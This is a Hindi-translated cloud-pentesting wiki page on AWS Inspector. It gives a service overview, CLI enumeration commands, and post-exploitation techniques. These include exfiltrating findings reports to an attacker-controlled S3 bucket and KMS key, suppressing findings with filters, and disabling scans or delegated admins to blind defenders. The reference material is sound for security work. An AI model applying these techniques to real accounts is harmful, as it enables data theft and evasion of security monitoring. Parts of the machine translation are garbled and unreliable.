AWS - Inspector Enum

AWS - Inspector Enum

इंस्पेक्टर

अमेज़न इंस्पेक्टर एक उन्नत, स्वचालित सुरक्षा प्रबंधन सेवा है जो आपके AWS परिवेश की सुरक्षा को बढ़ाने के लिए डिज़ाइन की गई है। यह सेवा लगातार अमेज़न EC2 इंस्टेंस, अमेज़न ECR में कंटेनर इमेजेस, अमेज़न ECS, और AWS लैम्बडा फंक्शन को वंशजन और अनचाहे नेटवर्क प्रकटियों के लिए स्कैन करती है। एक मजबूत वल्नरेबिलिटी इंटेलिजेंस डेटाबेस का लाभ उठाते हुए, अमेज़न इंस्पेक्टर विस्तृत फाइंडिंग्स प्रदान करता है, जिसमें गंभीरता स्तर और सुधार सिफारिशें शामिल हैं, संगठनों को सुरक्षा जोखिमों की पहचान और समाधान करने में सक्षम बनाते हैं। यह व्यापक दृष्टिकोण सुनिश्चित करता है कि विभिन्न AWS सेवाओं पर एक मजबूत सुरक्षा स्थिति है, जो अनुपालन और जोखिम प्रबंधन में सहायक है।

मुख्य तत्व

फाइंडिंग्स

अमेज़न इंस्पेक्टर में फाइंडिंग्स एक विस्तृत रिपोर्ट हैं जो स्कैन के दौरान खोजी गई गंभीरताओं और प्रकटियों के बारे में हैं। इसकी स्थिति के आधार पर, फाइंडिंग्स इस प्रकार श्रेणीबद्ध होती हैं:

• सक्रिय: फाइंडिंग ठीक नहीं की गई है।

• बंद: फाइंडिंग ठीक की गई है।

• दबाया गया: एक या एक से अधिक दबाव नियमों के कारण इस स्थिति में चिह्नित की गई है।

फाइंडिंग्स को अगले तीन प्रकारों में वर्गीकृत किया जाता है:

• पैकेज: ये फाइंडिंग्स आपके संसाधनों पर स्थापित सॉफ्टवेयर पैकेजों में गंभीरताओं से संबंधित हैं। उदाहरण हैं पुराने पुस्तकालय या ज्ञात सुरक्षा समस्याओं वाले डिपेंडेंसी के साथ।

• कोड: इस श्रेणी में आपके AWS संसाधनों पर चल रहे एप्लिकेशन के कोड में पाए गए गंभीरताएं शामिल हैं। सामान्य मुद्दे कोडिंग त्रुटियाँ या सुरक्षा उल्लंघन जैसी असुरक्षित प्रथाओं को शामिल हैं जो सुरक्षा उल्लंघनों की ओर ले जा सकती हैं।

• नेटवर्क: नेटवर्क फाइंडिंग्स हमलावरों द्वारा उत्पन्न किए जा सकने वाले नेटवर्क विन्यास में संभावित प्रकटियों की पहचान करती हैं। इनमें खुले पोर्ट्स, असुरक्षित नेटवर्क प्रोटोकॉल्स, और गलती से कॉन्फ़िगर किए गए सुरक्षा समूह शामिल हैं।

फ़िल्टर और दबाव नियम

अमेज़न इंस्पेक्टर में फ़िल्टर और दबाव नियम फाइंडिंग्स को प्रबंधित और प्राथमिकता देने में मदद करते हैं। फ़िल्टर आपको गंभीरता या संसाधन प्रकार जैसे विशिष्ट मापदंडों के आधार पर फाइंडिंग्स को अच्छी तरह से शुद्ध करने की अनुमति देते हैं। दबाव नियम आपको कुछ ऐसी फाइंडिंग्स को दबाने की अनुमति देते हैं जो कम जोखिम माने जाते हैं, पहले से ही सुधार लिए गए हैं, या किसी अन्य महत्वपूर्ण कारण के लिए, जिससे आपके सुरक्षा रिपोर्ट को ओवरलोड न होने दिया जाए और आपको अधिक महत्वपूर्ण मुद्दों पर ध्यान केंद्रित करने की अनुमति देते हैं।

सॉफ़्टवेयर बिल ऑफ़ मटीरियल्स (SBOM)

अमेज़न इंस्पेक्टर में सॉफ़्टवेयर बिल ऑफ़ मटीरियल्स (SBOM) एक निर्यात योग्य घुसपैठी इन्वेंट्री सूची है जो सॉफ़्टवेयर पैकेज के भीतर सभी घटकों का विस्तारित सूची है, जिसमें पुस्तकालय और डिपेंडेंसी जैसे लाइब्रेरीज और डिपेंडेंसीज़ शामिल हैं। SBOMs सॉफ़्टवेयर आपूर्ति श्रृंखला में पारदर्शिता प्रदान करने में मदद करते हैं, बेहतर वल्नरेबिलिटी प्रबंधन और अनुपालन को संभावित बनाते हैं। वे ओपन सोर्स और थर्ड-पार्टी सॉफ़्टवेयर कंपोनेंट्स के साथ जुड़ी और जोखिमों को पहचानने और समाधान करने में महत्वपूर्ण हैं।

मुख्य विशेषताएँ

फाइंडिंग्स निर्यात

अमेज़न इंस्पेक्टर फाइंडिंग्स को अमेज़न S3 बकेट्स, अमेज़न इवेंटब्रिज, और AWS सुरक्षा हब में निर्यात करने की क्षमता प्रदान करता है, जिससे आप निर्धारित तारीख और समय पर पहचाने गए गंभीरताओं और प्रकटियों की विस्तृत रिपोर्ट उत्पन्न कर सकते हैं। यह सुविधा CSV और JSON जैसे विभिन्न आउटपुट प्रारूपों का समर्थन करती है, जिससे अन्य उपकरणों और सिस्टमों के साथ आसानी से एकीकरण किया जा सकता है। निर्यात की सुविधा रिपोर्ट में शामिल किए जाने वाले डेटा को अनुकूलित करने की अनुमति देती है, जिससे आप गंभीरता, संसाधन प्रकार, या तिथि सीमा जैसे विशिष्ट माप

साइबर इंटरनेट सुरक्षा केंद्र (CIS) स्कैन

अमेज़न इंस्पेक्टर CIS स्कैन शामिल करता है ताकि अमेज़न EC2 इंस्टेंस ऑपरेटिंग सिस्टम को साइबर इंटरनेट सुरक्षा केंद्र (CIS) की सर्वश्रेष्ठ प्रथा सिफारिशों के खिलाफ मानक के रूप में बेंचमार्क करें। ये स्कैन समाकृति-मानक सुरक्षा आधाररेखाओं का पालन सुनिश्चित करते हैं।

• कॉन्फ़िगरेशन: CIS स्कैन यह मूल्यांकन करते हैं कि सिस्टम कॉन्फ़िगरेशन विशेष CIS बेंचमार्क सिफारिशों को पूरा करता है, हर चेक को एक CIS चेक आईडी और शीर्षक से जोड़ा गया है।

• क्रियान्वयन: स्कैन इंस्टेंस टैग और परिभाषित अनुसूचियों पर आधारित होते हैं या निर्धारित अनुसूचियों पर निर्धारित होते हैं।

• परिणाम: स्कैन के बाद के परिणाम दर्शाते हैं कि कौन से चेक पास हुए, छोड़े गए या विफल हुए, प्रत्येक इंस्टेंस की सुरक्षा स्थिति में अंतर्दृष्टि प्रदान करते हैं।

गणना

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

पोस्ट एक्सप्लोइटेशन

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

एक हमलावर विकल्पनों या सॉफ़्टवेयर बिल ऑफ़ मटीरियल्स (SBOMs) की विस्तृत रिपोर्ट बना सकता है और उन्हें अपने AWS वातावरण से बाहर ले जा सकता है। यह जानकारी विशिष्ट कमजोरियों, पुराने सॉफ़्टवेयर या असुरक्षित निर्भरताओं की पहचान के लिए उत्प्रेरित किया जा सकता है, जिससे लक्षित हमले किए जा सकते हैं।

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:

1. एक Amazon S3 बकेट बनाएं और उसे एक नीति संलग्न करें ताकि पीड़ित Amazon Inspector से पहुंचने के लिए पहुंचने योग्य हो:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}

2. एक अमेज़न केएमएस कुंजी बनाएं और उसे एक नीति संलग्न करें ताकि पीड़ित के अमेज़न इंस्पेक्टर द्वारा उपयोग किया जा सके:

{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}

3. निम्नलिखित कमांड को निष्कर्षित करें और फाइंडिंग रिपोर्ट बनाएं :

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• संभावित प्रभाव: विस्तृत कमजोरी और सॉफ़्टवेयर रिपोर्ट की उत्पत्ति और बाहरी ले जाना, विशिष्ट कमजोरियों और सुरक्षा कमजोरियों के बारे में अंतर्दृष्टि प्राप्त करना।

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

एक हमलावर निर्दिष्ट फाइंडिंग रिपोर्ट या SBOM रिपोर्ट की उत्पत्ति को रद्द कर सकता है, जिससे सुरक्षा टीम को कमजोरियों और सॉफ़्टवेयर बिल ऑफ़ मटीरियल (SBOMs) के बारे में समय पर जानकारी प्राप्त करने में विफल हो जाता है, सुरक्षा मुद्दों की पहचान और सुधार को देरी होती है।

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• संभावित प्रभाव: सुरक्षा मॉनिटरिंग का विघटन और सुरक्षा मुद्दों की समय पर पहचान और सुधार की निवारण को रोकना।

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

इन अनुमतियों के साथ एक हमलावर फ़िल्टरिंग नियमों को संचालित कर सकता है जो यह निर्धारित करते हैं कि कौन सी कमजोरियाँ और सुरक्षा मुद्दे रिपोर्ट किए जाएं या दबाए जाएं (यदि कार्रवाई को सेट किया गया है कि SUPPRESS, तो एक दमन नियम बनाया जाएगा)। इससे सुरक्षा प्रशासकों से महत्वपूर्ण कमजोरियाँ छुपा सकती हैं, जिससे इन कमजोरियों का उपयोग करना बिना पहचान के आसान हो जाए। महत्वपूर्ण फ़िल्टरों को बदलकर या हटाकर, एक हमलावर असमर्थन और प्रतिक्रिया में प्रभावी सुरक्षा मॉनिटरिंग और प्रतिक्रिया को बाधित करने के लिए असार के साथ सिस्टम को भर सकता है।

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• संभावित प्रभाव: महत्वपूर्ण दुरुपयोगों को छुपाना या दमन करना, या सिस्टम को अनुपयुक्त खोजों से भर देना।

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

एक हमलावर सुरक्षा प्रबंधन संरचना को बहुत अधिक विघटित कर सकता है।

• धाराप्रदेशित प्रशासक खाता निष्क्रिय करने से, हमलावर सुरक्षा टीम को अमेज़न इंस्पेक्टर सेटिंग्स और रिपोर्ट तक पहुंचने और प्रबंधित करने से रोक सकता है।

• अनधिकृत प्रशासक खाता सक्षम करने से हमलावर को सुरक्षा विन्यास को नियंत्रित करने की अनुमति मिल सकती है, संभावित रूप से स्कैन को अक्षम करना या सेटिंग्स को संदर्भित गतिविधियों को छुपाने के लिए संशोधित करना।

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• संभावित प्रभाव: सुरक्षा प्रबंधन का विघटन।

inspector2:AssociateMember, inspector2:DisassociateMember

एक हमलावर एक अमेज़न इंस्पेक्टर संगठन के भीतर सदस्य खातों के संबंध को मानित कर सकता है। अनधिकृत खातों को संबोधित करके या वैध खातों को असंबोधित करके, एक हमलावर सुरक्षा स्कैन और रिपोर्टिंग में कौन से खाते शामिल हैं उस पर नियंत्रण कर सकता है। इससे सुरक्षा मॉनिटरिंग से महत्वपूर्ण खाते बाहर हो सकते हैं, जिससे हमलावर को उन खातों में मौजूद दोषों का उपयोग करने की अनुमति मिल सकती है बिना किसी पहचान के।

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• संभावित प्रभाव: सुरक्षा स्कैन से मुख्य खातों को बाहर कर देना, जो संकेतित रूप से सुरक्षा गड़बड़ियों का शोधन करने की अनुमति देता है।

inspector2:अक्षम करें, (inspector2:सक्षम करें & iam:CreateServiceLinkedRole)

inspector2:अक्षम करें अनुमति वाले एक हमलावर को विशिष्ट संसाधन प्रकारों (EC2, ECR, Lambda, Lambda कोड) पर सुरक्षा स्कैन को अक्षम करने की क्षमता होगी, जिससे AWS वातावरण के भागों को अनुपेक्षित और हमलों के लिए विकर्षित छोड़ दिया जाएगा। इसके अतिरिक्त, inspector2:सक्षम करें & iam:CreateServiceLinkedRole अनुमतियों के द्वारा, एक हमलावर फिर से संदिग्ध विन्यासों के खोज को टालने के लिए स्कैन को पुनः सक्षम कर सकता है।

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• संभावित प्रभाव: सुरक्षा मॉनिटरिंग में अंधे स्थानों का निर्माण।

inspector2:UpdateOrganizationConfiguration

इस अनुमति के साथ एक हमलावर आपके अमेज़न इंस्पेक्टर संगठन के लिए विन्यास अपडेट कर सकेगा, जिससे नए सदस्य खातों के लिए सक्षम किए गए डिफ़ॉल्ट स्कैनिंग सुविधाएँ प्रभावित होंगी।

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• संभावित प्रभाव: संगठन के लिए सुरक्षा स्कैन नीतियों और विन्यास को बदलें।

inspector2:TagResource, inspector2:UntagResource

एक हमलावर AWS Inspector संसाधनों पर टैग को मानिये, जो संगठन, ट्रैकिंग, और स्वचालित सुरक्षा मूल्यांकन के लिए महत्वपूर्ण हैं। टैग को बदलकर या हटाकर, एक हमलावर संभावित रूप से सुरक्षा स्कैन से विकल्पों को छुपा सकता है, अनुपालन रिपोर्टिंग को बाधित कर सकता है, और स्वचालित उपचार प्रक्रियाओं में हस्तक्षेप कर सकता है, जिससे अनियंत्रित सुरक्षा मुद्दे और संयुक्त प्रणाली की अखंडता पर प्रभाव पड़ सकता है।

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• संभावित प्रभाव: सुरक्षा दोषों को छुपाना, अनुपालन रिपोर्टिंग का विघटन, सुरक्षा स्वचालन का विघटन और लागत आवंटन का विघटन।

संदर्भ

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html